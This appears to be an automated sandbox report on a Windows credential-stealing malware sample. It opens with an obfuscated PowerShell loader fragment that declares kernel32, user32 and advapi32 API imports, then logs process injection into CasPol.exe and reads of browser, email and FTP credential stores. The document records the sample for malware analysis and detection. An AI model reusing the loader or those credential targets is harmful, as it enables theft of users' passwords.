TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelku Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.cmdline Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB964.tmp" "c:\Users\user\AppData\Local\Temp\u5h0ocqr\CSC31BB2AFB2CA9494684B4A57A653EBF6B.TMP" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

barindex
Source: Yara match File source: 0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 7836, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: Yara match File source: 0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 7836, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: 0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 7836, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs